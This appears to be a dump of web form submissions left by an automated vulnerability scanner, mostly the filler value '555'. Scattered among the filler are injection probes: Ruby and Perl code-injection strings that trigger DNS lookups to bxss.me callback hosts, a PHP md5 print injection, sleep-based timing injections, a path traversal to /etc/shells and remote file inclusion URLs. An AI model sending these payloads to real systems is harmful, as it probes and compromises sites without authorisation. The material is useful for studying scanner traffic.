555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
index.php/.
555
555
555
555
555
index.php
555
555
"+"A".concat(70-3).concat(22*4).concat(113).concat(88).concat(117).concat(66)+(require"socket"
Socket.gethostbyname("hitbl"+"izoafyay31050.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
555"&&sleep(27*1000)*mfkuzv&&"
555
555
555
555
555
555'&&sleep(27*1000)*hecovk&&'
555
555
555
555
555
555
555
'"()
555
555
555
555
555
Array
555
555
555
'.gethostbyname(lc('hitio'.'ofegwsbgb7b6d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(72).chr(111).chr(68).'
555
555
Array
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
!(()&&!|*|*|
555
/etc/shells
555
555
555&n945097=v933351
555
555
555
555
555
https://bxss.me/t/fit.txt?.jpg
555
555
@@cdrSo
555
https://bxss.me/t/fit.txt
555
555
555
555